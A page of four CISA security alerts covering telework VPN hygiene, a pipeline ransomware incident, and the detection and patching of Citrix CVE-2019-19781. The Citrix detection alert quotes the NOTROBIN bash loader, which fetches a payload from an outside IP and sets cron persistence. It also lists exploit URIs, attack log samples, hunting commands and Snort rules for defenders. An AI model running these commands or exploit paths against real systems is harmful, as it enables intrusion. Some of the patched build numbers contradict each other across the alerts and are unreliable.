Current security issues, vulnerabilities, and exploits
AA20-073A: Enterprise VPN Security
by CISA on March 13, 2020 at 12:08 pm
Original release date: March 13, 2020SummaryAs organizations prepare for possible impacts of Coronavirus Disease 2019 (COVID-19), many may consider alternate workplace options for their employees. Remote work options—or telework—require an enterprise virtual private network (VPN) solution to connect employees to an organization’s information technology (IT) network. As organizations elect to implement telework, the Cybersecurity and Infrastructure Security Agency (CISA) encourages organizations to adopt a heightened state of cybersecurity. Technical DetailsThe following are cybersecurity considerations regarding telework. As organizations use VPNs for telework, more vulnerabilities are being found and targeted by malicious cyber actors. As VPNs are 24/7, organizations are less likely to keep them updated with the latest security updates and patches. Malicious cyber actors may increase phishing emails targeting teleworkers to steal their usernames and passwords. Organizations that do not use multi-factor authentication (MFA) for remote access are more susceptible to phishing attacks. Organizations may have a limited number of VPN connections, after which point no other employee can telework. With decreased availability, critical business operations may suffer, including IT security personnel’s ability to perform cybersecurity tasks. MitigationsCISA encourages organizations to review the following recommendations when considering alternate workplace options. Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and security configurations. See CISA Tips Understanding Patches and Securing Network Infrastructure Devices. Alert employees to an expected increase in phishing attempts. See CISA Tip Avoiding Social Engineering and Phishing Attacks. Ensure IT security personnel are prepared to ramp up the following remote access cybersecurity tasks: log review, attack detection, and incident response and recovery. Per the National Institute of Standards and Technology (NIST) Special Publication 800-46 v.2, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security, these tasks should be documented in the configuration management policy. Implement MFA on all VPN connections to increase security. If MFA is not implemented, require teleworkers to use strong passwords. (See CISA Tips Choosing and Protecting Passwords and Supplementing Passwords for more information.) Ensure IT security personnel test VPN limitations to prepare for mass usage and, if possible, implement modifications—such as rate limiting—to prioritize users that will require higher bandwidths. Contact CISA to report incidents, phishing, malware, and other cybersecurity concerns. References NIST Special Publication 800-46 v.2, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security CISA Cyber Essentials CERT/CC: VPN - A Gateway for Vulnerabilities National Security Agency Cybersecurity Advisory: Mitigating Recent VPN Vulnerabilities CISA Insights: Risk Management for Novel Coronavirus (COVID-19) Telework.gov Guidance Revisions March 13, 2020: Initial Version This product is provided subject to this Notification and this Privacy & Use policy.
AA20-049A: Ransomware Impacting Pipeline Operations
by CISA on February 18, 2020 at 1:06 pm
Original release date: February 18, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework. See the MITRE ATT&CK for Enterprise and ATT&CK for Industrial Control Systems (ICS) frameworks for all referenced threat actor techniques and mitigations. The Cybersecurity and Infrastructure Security Agency (CISA) encourages asset owner operators across all critical infrastructure sectors to review the below threat actor techniques and ensure the corresponding mitigations are applied. CISA responded to a cyberattack affecting control and communication assets on the operational technology (OT) network of a natural gas compression facility. A cyber threat actor used a Spearphishing Link [T1192] to obtain initial access to the organization’s information technology (IT) network before pivoting to its OT network. The threat actor then deployed commodity ransomware to Encrypt Data for Impact [T1486] on both networks. Specific assets experiencing a Loss of Availability [T826] on the OT network included human machine interfaces (HMIs), data historians, and polling servers. Impacted assets were no longer able to read and aggregate real-time operational data reported from low-level OT devices, resulting in a partial Loss of View [T829] for human operators. The attack did not impact any programmable logic controllers (PLCs) and at no point did the victim lose control of operations. Although the victim’s emergency response plan did not specifically consider cyberattacks, the decision was made to implement a deliberate and controlled shutdown to operations. This lasted approximately two days, resulting in a Loss of Productivity and Revenue [T828], after which normal operations resumed. CISA is providing this Alert to help administrators and network defenders protect their organizations against this and similar ransomware attacks. Technical DetailsNetwork and Assets The victim failed to implement robust segmentation between the IT and OT networks, which allowed the adversary to traverse the IT-OT boundary and disable assets on both networks. The threat actor used commodity ransomware to compromise Windows-based assets on both the IT and OT networks. Assets impacted on the organization’s OT network included HMIs, data historians, and polling servers. Because the attack was limited to Windows-based systems, PLCs responsible for directly reading and manipulating physical processes at the facility were not impacted. The victim was able to obtain replacement equipment and load last-known-good configurations to facilitate the recovery process. All OT assets directly impacted by the attack were limited to a single geographic facility. Planning and Operations At no time did the threat actor obtain the ability to control or manipulate operations. The victim took offline the HMIs that read and control operations at the facility. A separate and geographically distinct central control office was able to maintain visibility but was not instrumented for control of operations. The victim’s existing emergency response plan focused on threats to physical safety and not cyber incidents. Although the plan called for a full emergency declaration and immediate shutdown, the victim judged the operational impact of the incident as less severe than those anticipated by the plan and decided to implement limited emergency response measures. These included a four-hour transition from operational to shutdown mode combined with increased physical security. Although the direct operational impact of the cyberattack was limited to one control facility, geographically distinct compression facilities also had to halt operations because of pipeline transmission dependencies. This resulted in an operational shutdown of the entire pipeline asset lasting approximately two days. Although they considered a range of physical emergency scenarios, the victim’s emergency response plan did not specifically consider the risk posed by cyberattacks. Consequently, emergency response exercises also failed to provide employees with decision-making experience in dealing with cyberattacks. The victim cited gaps in cybersecurity knowledge and the wide range of possible scenarios as reasons for failing to adequately incorporate cybersecurity into emergency response planning. MitigationsAsset owner operators across all sectors are encouraged to consider the following mitigations using a risk-based assessment strategy. Planning and Operational Mitigations Ensure the organization’s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and loss of safety. In particular, response playbooks should identify criteria to distinguish between events requiring deliberate operational shutdown versus low-risk events that allow for operations to continue. Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications. Capture lessons learned in emergency response playbooks. Allow employees to gain decision-making experience via tabletop exercises that incorporate loss of visibility and control scenarios. Capture lessons learned in emergency response playbooks. Identify single points of failure (technical and human) for operational visibility. Develop and test emergency response playbooks to ensure there are redundant channels that allow visibility into operations when one channel is compromised. Implement redundant communication capabilities between geographically separated facilities responsible for the operation of a single pipeline asset. Coordinate planning activities across all such facilities. Recognize the physical risks that cyberattacks pose to safety and integrate cybersecurity into the organization’s safety training program. Ensure the organization’s security program and emergency response plan consider third parties with legitimate need for OT network access, including engineers and vendors. Technical and Architectural Mitigations Implement and ensure robust Network Segmentation [M1030] between IT and OT networks to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone (DMZ) that eliminates unregulated communication between the IT and OT networks. Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to Filter Network Traffic [M1037] and monitor communications between zones. Prohibit Industrial Control System (ICS) protocols from traversing the IT network. Require Multi-Factor Authentication [M1032] to remotely access the OT and IT networks from external sources. Implement regular Data Backup [M1053] procedures on both the IT and OT networks. Ensure that backups are regularly tested and isolated from network connections that could enable the spread of ransomware. Ensure user and process accounts are limited through Account Use Policies [M1036], User Account Control [M1052], and Privileged Account Management [M1026]. Organize access rights based on the principles of least privilege and separation of duties. Enable strong spam filters to prevent phishing emails from reaching end users. Implement a User Training [M1017] program to discourage users from visiting malicious websites or opening malicious attachments. Filter emails containing executable files from reaching end users. Filter Network Traffic [M1037] to prohibit ingress and egress communications with known malicious Internet Protocol (IP) addresses. Prevent users from accessing malicious websites using Uniform Resource Locator (URL) blacklists and/or whitelists. Update Software [M1051], including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system. Set Antivirus/Antimalware [M1049] programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware. Implement Execution Prevention [M1038] by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications. Implement Execution Prevention [M1038] via application whitelisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder. Limit Access to Resources over Network [M1035], especially by restricting Remote Desktop Protocol (RDP). If after assessing risks RDP is deemed operationally necessary, restrict the originating sources and require Multi-Factor Authentication [M1032]. Resources CISA Ransomware One-Pager and Technical Document (CISA, 2019) CISA Insights: Ransomware Outbreak (CISA, 2019) Pipeline Cybersecurity Initiative (CISA, 2018) CISA Webinar: Combating Ransomware (CISA, 2018) Framework for Improving Critical Infrastructure Cybersecurity (NIST, 2018) Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events (NIST, 2018) Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events (NIST, 2018) Pipeline Security Guidelines (TSA, 2018) NIST SP 800-11: Data Integrity: Recovering from Ransomware and Other Destructive Events (NIST, 2017) Guide to Industrial Control Systems (ICS) Security (NIST, 2015) Oil and Natural Gas Subsector Cybersecurity Capability Maturity Model (DOE, 2014) Revisions February 18, 2020: Initial Version This product is provided subject to this Notification and this Privacy & Use policy.
AA20-031A: Detecting Citrix CVE-2019-19781
by CISA on January 31, 2020 at 6:07 pm
Original release date: January 31, 2020 | Last revised: February 18, 2020SummaryUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781. Though mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later. Compromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed. The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation. Contact CISA, or the FBI to report an intrusion or to request assistance. Technical DetailsDetection CISA has developed the following procedures for detecting a CVE-2019-19781 compromise. HTTP Access and Error Log Review Context: Host Hunt Type: Methodology The impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in /var/log. Log files httpaccess.log and httperror.log should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released. '*/../vpns/*' '*/vpns/cfg/smb.conf' '*/vpns/portal/scripts/newbm.pl*' '*/vpns/portal/scripts/rmbm.pl*' '*/vpns/portal/scripts/picktheme.pl*' Note: These URIs were observed in Security Information and Event Management detection content provided by https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml. Per TrustedSec, a sign of successful exploitation would be a POST request to a URI containing /../ or /vpn, followed by a GET request to an XML file. If any exploitation activity exists—attempted or successful—analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak’s blog provided sample logs indicating what a successful attack would look like. 10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT " 10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT" Additionally, FireEye provided the following grep commands to assist with log review and help to identify suspicious activity. grep -iE 'POST.*\.pl HTTP/1\.1\" 200 ' /var/log/httpaccess.log -A 1 grep -iE 'GET.*\.xml HTTP/1\.1\" 200' /var/log/httpaccess.log -B 1 Running Processes Review Context: Host Hunt Type: Methodology Reviewing the running processes on a system suspected of compromise for processes running under the nobody user can identify potential backdoors. ps auxd | grep nobody Analysts should review the ps output for suspicious entries such as this: nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `– sh -c uname & curl -o – http://10.1.1.2/backdoor Further pivoting can be completed using the Process ID from the PS output: lsof -p <pid> Due to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the httpd process. Checking for NOTROBIN Presence Context: Host Hunt Type: Methodology pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &" The above is the NOTROBIN Bash exploit code. To check for NOTROBIN Presence, analysts should look for the staging directory at /tmp/.init as well as httpd processes running as a cron job. Running the command find / -name ".init" 2> /tmp/error.log should return the path to the created staging directory while taking all of the errors and creating a file located at /tmp/error.log. Additional /var/log Review Context: Host Hunt Type: Methodology Analysts should focus on reviewing the following logs in /var/log on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the nobody user or (null) on and should try to identify any suspicious commands that may have been run, such as whoami or curl. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log. bash.log Sample Log Entry: Jan 10 13:35:47 <local7.notice> ns bash: nobody on /dev/pts/3 shell_command="hostname" Note: The bash log can provide the user (nobody), command (hostname), and process id (63394) related to the nefarious activity. sh.log notice.log Check Crontab for Persistence Context: Host Hunt Type: Methodology As with running processes and log entries, any cron jobs created by the user nobody are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a httpd process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command: crontab -l -u nobody Existence of Unusual Files Context: Host Hunt Type: Methodology Open-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server. /netscaler/portal/templates /var/tmp/netscaler/portal/templates Snort Alerts Context: Network Alert Type: Signatures Although most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye’s blog post and would likely indicate a vulnerable Citrix server. These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives. alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .CONF response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"al]|0d0a|"; distance:0; content:"encrypt passwords"; distance:0; content:"name resolve order"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .PL response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"|0d0a|Connection: Keep-Alive"; content:"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6 a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74 2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534 3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;) Suspicious Network Traffic Context: Network Hunt Type: Methodology From a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing /../ or /vpns/ to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful POST request followed by a successful GET request with the aforementioned characteristics. Given that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.). Inbound Exploitation Activity (Suspicious URIs) index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml Outbound Traffic Search (Backdoor C2) index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET> | stats count by src dest dest_port | sort -count The following resources provide additional detection measures. Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781. The tool aids customers with detecting potential IOCs based on known attacks and exploits. The National Security Agency released a Cybersecurity Advisory on CVE-2020-19781 with additional detection measures. CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781. Impact CVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system. The vulnerability affects the following appliances: Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before 10.5.70.12 Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 126.96.36.199 Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 188.8.131.52 Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 184.108.40.206 Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 220.127.116.11 Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer). MitigationsThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances. Use Citrix's tool to check for the vulnerability. https://support.citrix.com/article/CTX269180 Use an open-source utility to check for the vulnerability or previous device compromise. https://github.com/cisagov/check-cve-2019-19781 https://github.com/x1sec/citrixmash_scanner https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2 Follow instructions from Citrix to mitigate the vulnerability. https://support.citrix.com/article/CTX267679 https://support.citrix.com/article/CTX267027 Upgrade firmware to a patched version. Subscribe to Citrix Alerts for firmware updates. https://support.citrix.com/user/alerts Patch devices to the most current version. https://www.citrix.com/downloads/citrix-gateway/ https://www.citrix.com/downloads/citrix-adc/ https://www.citrix.com/downloads/citrix-sd-wan/ Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances. CISA's Tip Handling Destructive Malware provides additional information, including best practices and incident response strategies. References  Citrix blog: Citrix releases final fixes for CVE-2019-19781  GitHub web_citrix_cve_2019_19781_exploit.yml  TrustedSec blog: NetScaler Remote Code Execution Forensics  FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)  FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)  IOC scanning tool for CVE-2019-19781  NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability  CISA Vulnerability Test Tool Revisions January 31, 2020: Initial Version February 7, 2020: Added link to the Australian Cyber Security Centre script This product is provided subject to this Notification and this Privacy & Use policy.
AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP
by CISA on January 20, 2020 at 2:54 pm
Original release date: January 20, 2020 | Last revised: January 27, 2020SummaryNote: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781. On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0. On January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances. On January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0. On January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5. A remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild. The Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible. Timeline of Specific Events December 17, 2019 – Citrix released Security Bulletin CTX267027 with mitigations steps. January 8, 2020 – The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability, and CISA releases a Current Activity entry. January 10, 2020 – The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781. January 11, 2020 – Citrix released blog post on CVE-2019-19781 with timeline for fixes. January 13, 2020 – CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability. January 16, 2020 – Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781. January 19, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes. January 22, 2020 – Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3. January 22, 2020 – Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781. January 23, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0. January 24, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5. Technical DetailsImpact On December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild. The vulnerability affects the following appliances: Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before 10.5.70.12 Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 18.104.22.168 Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 22.214.171.124 Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 126.96.36.199 Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 188.8.131.52 Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer). Detection Measures Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781 on January 22, 2020. The tool aids customers with detecting potential IOCs based on known attacks and exploits. See the National Security Agency’s Cybersecurity Advisory on CVE-2020-19781 for other detection measures. CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781. CISA encourages administrators to visit CISA’s GitHub page to download and run the tool. MitigationsCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible. The fixed builds can be downloaded from Citrix Downloads pages for Citrix ADC, Citrix Gateway, and Citrix SD-WAN. Until the appropriate update is implemented, users and administrators should apply Citrix’s interim mitigation steps for CVE-2019-19781. Verify the successful application of the above mitigations by using the tool in CTX269180 – CVE-2019-19781 – Verification ToolTest. Note: these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments. Refer to table 1 for Citrix’s fix schedule. Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781 Vulnerable Appliance Firmware Update Release Date Citrix ADC and Citrix Gateway version 10.5 Refresh Build 10.5.70.12 January 24, 2020 Citrix ADC and Citrix Gateway version 11.1 Refresh Build 184.108.40.206 January 19, 2020 Citrix ADC and Citrix Gateway version 12.0 Refresh Build 220.127.116.11 January 19, 2020 Citrix ADC and Citrix Gateway version 12.1 Refresh Build 18.104.22.168 January 23, 2020 Citrix ADC and Citrix Gateway version 13.0 Refresh Build 22.214.171.124 January 23, 2020 Citrix SD-WAN WANOP Release 10.2.6 Build 10.2.6b January 22, 2020 Citrix SD-WAN WANOP Release 11.0.3 Build 11.0.3b January 22, 2020 Administrators should review NSA’s Citrix Advisory for other mitigations, such as applying the following defense-in-depth strategy: “Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.” References  Citrix blog: Citrix releases final fixes for CVE-2019-19781  Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway  United Kingdom National Cyber Secrity Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability  CERT/CC Vulnerability Note VU#619785  CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability  NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway  Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability  CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov – check-cve-2019-19781  Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated  Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP  Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781  Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0  Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781  NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway  CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov – check-cve-2019-19781  Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781  Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway  Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway Revisions January 20, 2020: Initial Version January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and Gateway versions 10.5, 12.1, and 13.0 January 27, 2020: Updated vulnernable versions of ADC and Gateway version 10.5 This product is provided subject to this Notification and this Privacy & Use policy.